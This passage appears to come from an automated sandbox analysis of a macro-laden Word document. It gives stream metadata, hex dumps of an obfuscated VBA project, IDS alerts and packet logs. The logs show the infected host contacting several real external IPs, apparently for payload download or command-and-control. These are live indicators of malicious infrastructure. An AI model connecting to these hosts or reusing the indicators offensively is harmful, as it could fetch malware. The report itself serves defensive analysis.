                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 10 02 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 74 01 00 00 04 00 00 00 58 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00
                                              Stream Path: 1Table, File Type: data, Stream Size: 6493
                                              General
                                              Stream Path: 1Table
                                              File Type: data
                                              Stream Size: 6493
                                              Entropy: 6.028999636
                                              Base64 Encoded: True
                                              Data ASCII:f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                              Data Raw:66 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 00 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                              Stream Path: Data, File Type: data, Stream Size: 99185
                                              General
                                              Stream Path: Data
                                              File Type: data
                                              Stream Size: 99185
                                              Entropy: 7.38960224856
                                              Base64 Encoded: True
                                              Data ASCII:q . . . D . d . . . . . . . . . . . . . . . . . . . . . J F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . A . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . i . c . t . u . r . e . . 1 . . . . . . . . . . . . . . . R . . . . . . . . . I W . . . . e . . + . " a . I . . . . . . . . . . . D . . . . . . . . F . . . . . . I W . . . . e . . + . " a . I . . . . . . .
                                              Data Raw:71 83 01 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 4a 46 ef 1f 08 02 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 83 00 0b f0 46 00 00 00 bf 00 04 00 04 00 04 41 01 00 00 00 05 c1 02 00 00 00 3f 01 00 00 06 00 bf 01 00 00
                                              Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 517
                                              General
                                              Stream Path: Macros/PROJECT
                                              File Type: ASCII text, with CRLF line terminators
                                              Stream Size: 517
                                              Entropy: 5.55798386141
                                              Base64 Encoded: True
                                              Data ASCII:I D = " { B 4 0 1 A A D A - A 5 D 9 - 4 A 5 B - B 2 C F - 6 8 1 6 1 E D 3 5 F F D } " . . D o c u m e n t = O u z _ y 2 8 f 7 e h n q n / & H 0 0 0 0 0 0 0 0 . . M o d u l e = Z 5 n c c 5 d w i d b k j l d . . M o d u l e = J w q 9 b 1 l b 0 h m m 7 . . E x e N a m e 3 2 = " S 0 z x n a n c z t d " . . N a m e = " m w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A E A C 8 3 E 1 8 3 2 1 B F 2 5 B F 2 5 B F 2 5 B F 2 5 " . . D P B = "
                                              Data Raw:49 44 3d 22 7b 42 34 30 31 41 41 44 41 2d 41 35 44 39 2d 34 41 35 42 2d 42 32 43 46 2d 36 38 31 36 31 45 44 33 35 46 46 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 4f 75 7a 5f 79 32 38 66 37 65 68 6e 71 6e 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 5a 35 6e 63 63 35 64 77 69 64 62 6b 6a 6c 64 0d 0a 4d 6f 64 75 6c 65 3d 4a 77 71 39 62 31 6c 62 30 68 6d 6d 37 0d 0a 45
                                              Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 137
                                              General
                                              Stream Path: Macros/PROJECTwm
                                              File Type: data
                                              Stream Size: 137
                                              Entropy: 3.82716267344
                                              Base64 Encoded: False
                                              Data ASCII:O u z _ y 2 8 f 7 e h n q n . O . u . z . _ . y . 2 . 8 . f . 7 . e . h . n . q . n . . . Z 5 n c c 5 d w i d b k j l d . Z . 5 . n . c . c . 5 . d . w . i . d . b . k . j . l . d . . . J w q 9 b 1 l b 0 h m m 7 . J . w . q . 9 . b . 1 . l . b . 0 . h . m . m . 7 . . . . .
                                              Data Raw:4f 75 7a 5f 79 32 38 66 37 65 68 6e 71 6e 00 4f 00 75 00 7a 00 5f 00 79 00 32 00 38 00 66 00 37 00 65 00 68 00 6e 00 71 00 6e 00 00 00 5a 35 6e 63 63 35 64 77 69 64 62 6b 6a 6c 64 00 5a 00 35 00 6e 00 63 00 63 00 35 00 64 00 77 00 69 00 64 00 62 00 6b 00 6a 00 6c 00 64 00 00 00 4a 77 71 39 62 31 6c 62 30 68 6d 6d 37 00 4a 00 77 00 71 00 39 00 62 00 31 00 6c 00 62 00 30 00 68 00 6d
                                              Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3895
                                              General
                                              Stream Path: Macros/VBA/_VBA_PROJECT
                                              File Type: data
                                              Stream Size: 3895
                                              Entropy: 5.10348295591
                                              Base64 Encoded: False
                                              Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                              Data Raw:cc 61 85 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                              Stream Path: Macros/VBA/dir, File Type: Apollo m68k COFF executable not stripped - version 18435, Stream Size: 667
                                              General
                                              Stream Path: Macros/VBA/dir
                                              File Type: Apollo m68k COFF executable not stripped - version 18435
                                              Stream Size: 667
                                              Entropy: 6.36338461124
                                              Base64 Encoded: True
                                              Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m . . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . . . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . X * \\ C . . . . t . m . . . . ! O f f i c
                                              Data Raw:01 97 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d a2 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 98 a7 da 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                              Stream Path: WordDocument, File Type: data, Stream Size: 22574
                                              General
                                              Stream Path: WordDocument
                                              File Type: data
                                              Stream Size: 22574
                                              Entropy: 3.92066931997
                                              Base64 Encoded: False
                                              Data ASCII:. . . . [ . . . . . . . . . . . . . . . . . . . . . . . . S . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . X . . . . . . . . . . . K . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . u . . . . . . . u . . . . . . . u . . . . . . . u . . . . . . . u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:ec a5 c1 00 5b 80 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 0d 53 00 00 0e 00 62 6a 62 6a ac fa ac fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 58 00 00 ce 90 01 00 ce 90 01 00 0d 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                              Network Behavior

                                              Snort IDS Alerts

                                              Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                              01/07/21-11:47:08.799892 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | - | - | 192.168.2.22 | 8.8.8.8
                                              01/07/21-11:47:12.031373 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | - | - | 10.84.1.70 | 192.168.2.22
                                              01/07/21-11:47:15.029345 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | - | - | 10.84.1.70 | 192.168.2.22
                                              01/07/21-11:47:21.039486 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | - | - | 10.84.1.70 | 192.168.2.22
                                              01/07/21-11:47:32.773394 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | - | - | 58.97.195.135 | 192.168.2.22
                                              01/07/21-11:47:32.773434 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | - | - | 58.97.195.135 | 192.168.2.22
                                              01/07/21-11:47:38.088826 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | - | - | 58.97.195.135 | 192.168.2.22
                                              01/07/21-11:47:38.088841 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | - | - | 58.97.195.135 | 192.168.2.22
                                              01/07/21-11:47:39.372826 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | - | - | 58.97.195.135 | 192.168.2.22
                                              01/07/21-11:47:42.622670 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | - | - | 58.97.195.135 | 192.168.2.22
                                              01/07/21-11:47:58.632181 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | - | - | 58.97.195.135 | 192.168.2.22
                                              01/07/21-11:48:13.482004 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | - | - | 58.97.195.135 | 192.168.2.22

                                              Network Port Distribution

                                              TCP Packets

                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Jan 7, 2021 11:47:05.812747955 CET | 49165 | 80 | 192.168.2.22 | 66.85.46.76
                                              Jan 7, 2021 11:47:05.962234974 CET | 80 | 49165 | 66.85.46.76 | 192.168.2.22
                                              Jan 7, 2021 11:47:05.962523937 CET | 49165 | 80 | 192.168.2.22 | 66.85.46.76
                                              Jan 7, 2021 11:47:05.965092897 CET | 49165 | 80 | 192.168.2.22 | 66.85.46.76
                                              Jan 7, 2021 11:47:06.114531994 CET | 80 | 49165 | 66.85.46.76 | 192.168.2.22
                                              Jan 7, 2021 11:47:07.069713116 CET | 80 | 49165 | 66.85.46.76 | 192.168.2.22
                                              Jan 7, 2021 11:47:07.069770098 CET | 80 | 49165 | 66.85.46.76 | 192.168.2.22
                                              Jan 7, 2021 11:47:07.069837093 CET | 80 | 49165 | 66.85.46.76 | 192.168.2.22
                                              Jan 7, 2021 11:47:07.069942951 CET | 49165 | 80 | 192.168.2.22 | 66.85.46.76
                                              Jan 7, 2021 11:47:07.072895050 CET | 80 | 49165 | 66.85.46.76 | 192.168.2.22
                                              Jan 7, 2021 11:47:07.072925091 CET | 80 | 49165 | 66.85.46.76 | 192.168.2.22
                                              Jan 7, 2021 11:47:07.073014975 CET | 49165 | 80 | 192.168.2.22 | 66.85.46.76
                                              Jan 7, 2021 11:47:07.073151112 CET | 80 | 49165 | 66.85.46.76 | 192.168.2.22
                                              Jan 7, 2021 11:47:07.073260069 CET | 80 | 49165 | 66.85.46.76 | 192.168.2.22
                                              Jan 7, 2021 11:47:07.073304892 CET | 80 | 49165 | 66.85.46.76 | 192.168.2.22
                                              Jan 7, 2021 11:47:07.073339939 CET | 80 | 49165 | 66.85.46.76 | 192.168.2.22
                                              Jan 7, 2021 11:47:07.073350906 CET | 49165 | 80 | 192.168.2.22 | 66.85.46.76
                                              Jan 7, 2021 11:47:07.073368073 CET | 80 | 49165 | 66.85.46.76 | 192.168.2.22
                                              Jan 7, 2021 11:47:07.073400021 CET | 49165 | 80 | 192.168.2.22 | 66.85.46.76
                                              Jan 7, 2021 11:47:07.219362974 CET | 80 | 49165 | 66.85.46.76 | 192.168.2.22
                                              Jan 7, 2021 11:47:07.219434977 CET | 80 | 49165 | 66.85.46.76 | 192.168.2.22
                                              Jan 7, 2021 11:47:07.219476938 CET | 80 | 49165 | 66.85.46.76 | 192.168.2.22
                                              Jan 7, 2021 11:47:07.219515085 CET | 80 | 49165 | 66.85.46.76 | 192.168.2.22
                                              Jan 7, 2021 11:47:07.219651937 CET | 49165 | 80 | 192.168.2.22 | 66.85.46.76
                                              Jan 7, 2021 11:47:07.222326994 CET | 80 | 49165 | 66.85.46.76 | 192.168.2.22
                                              Jan 7, 2021 11:47:07.222367048 CET | 80 | 49165 | 66.85.46.76 | 192.168.2.22
                                              Jan 7, 2021 11:47:07.222455978 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.222476006 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.222513914 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.222568035 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.222582102 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.222615004 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.222693920 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.222701073 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.222738981 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.222774982 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.222819090 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.222827911 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.222872019 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.222893000 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.222918034 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.222955942 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.222980976 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.223005056 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.223062038 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.369332075 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.369431973 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.369478941 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.369522095 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.369563103 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.369580030 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.369581938 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.369623899 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.369662046 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.369683981 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.369712114 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.369769096 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.372085094 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.372127056 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.372164965 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.372198105 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.372215986 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.372256994 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.372288942 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.372306108 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.372368097 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:07.372442961 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:07.578686953 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:08.776680946 CET4916680192.168.2.22193.187.117.26
                                              Jan 7, 2021 11:47:11.775449038 CET4916680192.168.2.22193.187.117.26
                                              Jan 7, 2021 11:47:12.223404884 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:12.223617077 CET4916580192.168.2.2266.85.46.76
                                              Jan 7, 2021 11:47:17.782033920 CET4916680192.168.2.22193.187.117.26
                                              Jan 7, 2021 11:47:29.989146948 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:30.138712883 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:30.138955116 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:30.139081001 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:30.288525105 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.352452040 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.352494955 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.352545023 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.352561951 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.352581978 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.352615118 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.352634907 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.352646112 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.352674007 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.352686882 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.354415894 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.354450941 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.354563951 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.382409096 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.382546902 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.502430916 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.502476931 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.502523899 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.502563000 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.502564907 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.502602100 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.502640009 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.502645969 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.502676010 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.502712011 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.502727985 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.502757072 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.502794027 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.502804995 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.502830029 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.502865076 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.502866983 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.502933979 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.503002882 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.504120111 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.504218102 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.504256010 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.504292965 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.504297972 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.504370928 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.532478094 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.532525063 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.532561064 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.532598972 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.532608032 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.532696962 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.652972937 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653086901 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653127909 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653167009 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653203011 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653249025 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.653280973 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.653317928 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653388023 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.653424025 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653485060 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653522968 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653558969 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653572083 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.653597116 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653633118 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653657913 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.653680086 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653717041 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.653719902 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653757095 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653790951 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.653793097 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653831005 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653865099 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.653866053 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653903008 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653968096 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.653995991 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.654083014 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.654088020 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.654122114 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.654158115 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.654194117 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.654202938 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.654243946 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.654266119 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.654278994 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.654315948 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.654339075 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.654352903 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.654387951 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.654422045 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.654423952 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.654463053 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.654486895 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.654509068 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.654578924 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.682523012 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.682576895 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.682614088 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.682651043 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.682687044 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.682703018 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.682723999 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.682763100 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.682786942 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.682833910 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.682852030 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.804532051 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.804601908 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.804630995 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.804660082 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.804687977 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.804902077 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.967391014 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:32.205476046 CET4434916858.97.195.135192.168.2.22
                                              Jan 7, 2021 11:47:32.205780029 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:32.221276045 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:32.459502935 CET4434916858.97.195.135192.168.2.22
